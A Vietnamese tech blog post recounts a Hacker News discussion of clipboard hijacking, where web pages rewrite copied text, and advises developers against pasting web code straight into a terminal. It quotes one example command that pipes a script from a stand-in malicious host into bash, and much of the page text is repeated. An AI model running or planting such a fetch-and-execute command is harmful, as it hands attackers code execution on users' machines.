Copy Fail: Drama Hacker News về Clipboard Hijacking

Đã bao giờ anh em cào phím miệt mài, bí quá bèn Google, bôi đen một đoạn code xịn xò con bò trên mạng, Ctrl+C tự tin vãi chưởng, xong paste vào IDE thì nó lòi ra nguyên một sớ "Read more at..." chưa? Cay đ*o chịu được đúng không?

Chuyện quái gì vừa xảy ra với cái Clipboard của tôi?

Mới đây, trên Hacker News vừa nổ ra một topic thu hút hơn 1250 điểm vọt lên top trending mang tên Copy Fail (kèm cái link gốc nghe đã thấy uy tín: copy.fail). Chả là có một ông dev nào đó vì quá rảnh rỗi (hoặc quá cay cú) đã làm ra hẳn một cái trang web demo thực tế về việc: Trình duyệt của bạn đang bị thao túng tâm lý như thế nào mỗi khi bạn bấm nút Copy.

Cho anh em lười click link thì đây là tóm tắt toàn cảnh:

Trang web này chĩa thẳng mũi dùi vào Clipboard API và cái trò ma giáo dùng JavaScript để ghi đè dữ liệu lên bộ nhớ tạm của người dùng.
Bạn bôi đen dòng chữ npm install lib-xịn, nhưng khi paste ra terminal, nó có thể biến thành curl http://malicious-site.com/script.sh | bash và tự động gõ luôn phím Enter. Ảo ma chưa?
Nó bóc phốt luôn cái trò phèn chúa của mấy trang tin tức hay blog: bạn copy 1 câu, nó nhét thêm 10 dòng bản quyền, link bài viết, số điện thoại liên hệ như một tờ rơi phát ở ngã tư.
Và tất nhiên, không thể thiếu combo cấm Right-click, cấm bôi đen, làm anh em thợ code phải lôi F12 ra ngồi mò mẫm bóc từng thẻ HTML như bóc cua.

Giang cư mận Hacker News tế sống các pháp sư Web

Với một cộng đồng toàn các lão quái IT như Hacker News thì vụ này chả khác gì chọc vào tổ kiến lửa. Dân tình chia phe combat cực kỳ rôm rả, nhưng nhìn chung là chửi hăng lắm:

Phe "Nạn nhân của báo mạng": Đa số anh em đều than vãn về mấy trang tin tức hoặc recipe nấu ăn. Đang code dở, chạy ra copy cái config mà dính nguyên dòng "Vui lòng trích nguồn" làm crash luôn cả app. Nhiều ông còn thề sẽ block sạch mấy trang có trò này.
Phe "Thuyết âm mưu bảo mật": Một pháp sư ẩn danh lại lôi cái kịch bản kinh điển ra dọa: Copy code dán thẳng vào terminal là hành động tự sát. Cái trò ẩn mã độc bằng CSS display: none rồi nhét vào clipboard khi user copy vẫn đang là một cái bẫy siêu to khổng lồ.
Phe "Bảo thủ cực đoan": Nhóm này khuyên anh em cài NoScript, tắt m* JavaScript đi cho nhẹ đầu. Dựng con blog trên cái VPS ghẻ thì cứ HTML thuần mà táng, nhét mớ JS cắn RAM vào làm gì để rồi đẻ ra mấy cái bug UX phèn lậu này?

Góc nhìn từ Coding4Food: Bài học sinh tồn cho anh em thợ code

Tóm cái váy lại, qua vụ này anh em rút ra được gì?

Thứ nhất, trên tư cách là người dùng, đạo hữu nào có thói quen copy code từ web rồi dán thẳng vào Terminal thì bỏ ngay đi nhé. Trừ khi các ông thích bị sập server hay muốn dâng shell cho hacker. Cứ dán vào một cái text editor thuần (như Notepad) để xem mặt mũi nó ra sao rồi hãy dùng.

Thứ hai, trên tư cách là người code (hoặc nạn nhân bị sếp dí). Nếu một ngày đẹp trời, gã PM đập bàn yêu cầu bạn: "Em ơi, làm tính năng cấm copy hoặc chèn link bản quyền vào clipboard cho web mình đi". Hãy dũng cảm đứng lên, nhìn thẳng vào mắt hắn và nói: "Anh bớt lùa gà đi!".

Clipboard là vùng đất thiêng liêng của người dùng, đừng cố gắng kiểm soát nó. Làm web thì UX mượt mà, nội dung xịn là người ta tự nhớ, chứ ba cái trò tiểu xảo khóa mõm người dùng thế này chỉ chứng tỏ mình đang đi lùi về thời Web 1.0 năm 2005 thôi các đồng đạo ạ.

Nguồn hóng hớt:

Chuyện quái gì vừa xảy ra với cái Clipboard của tôi?

Cho anh em lười click link thì đây là tóm tắt toàn cảnh:

Trang web này chĩa thẳng mũi dùi vào Clipboard API và cái trò ma giáo dùng JavaScript để ghi đè dữ liệu lên bộ nhớ tạm của người dùng.

Bạn bôi đen dòng chữ npm install lib-xịn, nhưng khi paste ra terminal, nó có thể biến thành curl http://malicious-site.com/script.sh | bash và tự động gõ luôn phím Enter. Ảo ma chưa?

Nó bóc phốt luôn cái trò phèn chúa của mấy trang tin tức hay blog: bạn copy 1 câu, nó nhét thêm 10 dòng bản quyền, link bài viết, số điện thoại liên hệ như một tờ rơi phát ở ngã tư.

Và tất nhiên, không thể thiếu combo cấm Right-click, cấm bôi đen, làm anh em thợ code phải lôi F12 ra ngồi mò mẫm bóc từng thẻ HTML như bóc cua.

Giang cư mận Hacker News tế sống các pháp sư Web

Phe "Nạn nhân của báo mạng": Đa số anh em đều than vãn về mấy trang tin tức hoặc recipe nấu ăn. Đang code dở, chạy ra copy cái config mà dính nguyên dòng "Vui lòng trích nguồn" làm crash luôn cả app. Nhiều ông còn thề sẽ block sạch mấy trang có trò này.

Phe "Thuyết âm mưu bảo mật": Một pháp sư ẩn danh lại lôi cái kịch bản kinh điển ra dọa: Copy code dán thẳng vào terminal là hành động tự sát. Cái trò ẩn mã độc bằng CSS display: none rồi nhét vào clipboard khi user copy vẫn đang là một cái bẫy siêu to khổng lồ.

Phe "Bảo thủ cực đoan": Nhóm này khuyên anh em cài NoScript, tắt m* JavaScript đi cho nhẹ đầu. Dựng con blog trên cái VPS ghẻ thì cứ HTML thuần mà táng, nhét mớ JS cắn RAM vào làm gì để rồi đẻ ra mấy cái bug UX phèn lậu này?

Góc nhìn từ Coding4Food: Bài học sinh tồn cho anh em thợ code

Tóm cái váy lại, qua vụ này anh em rút ra được gì?

Nguồn hóng hớt:

Copy Fail: Khi Ctrl+C Phản Bội Lại Niềm Tin Của Anh Em Dev

Chuyện quái gì vừa xảy ra với cái Clipboard của tôi?

Giang cư mận Hacker News tế sống các pháp sư Web

Góc nhìn từ Coding4Food: Bài học sinh tồn cho anh em thợ code

Bình luận

Chuyện quái gì vừa xảy ra với cái Clipboard của tôi?

Giang cư mận Hacker News tế sống các pháp sư Web

Góc nhìn từ Coding4Food: Bài học sinh tồn cho anh em thợ code

Bài viết liên quan

Bóc phốt đài BBC 'lùa gà' và bài học tối ưu hệ thống từ mấy dì giao sữa chua Nhật Bản

Vite+: Gom Sạch Cả Cái Frontend Stack Vào Một Cục, Anh Em Sẵn Sàng Làm Chuột Bạch Chưa?

OpenAI thả xích "Codex for almost everything": Anh em dev chuẩn bị ra gầm cầu hay lên hương?

Pháp sư Trung Hoa thả xích Qwen3.6-35B-A3B: Đệ tử tự code, tự fix bug cho anh em

Roll: Con App Bắt Người Dùng 'Khổ Dâm' Chờ 1 Năm Để Xem Ảnh Đang Phá Đảo Product Hunt

Google nhét Gemma 4 vào iPhone: Màn cà khịa cực mạnh từ nhà sếp G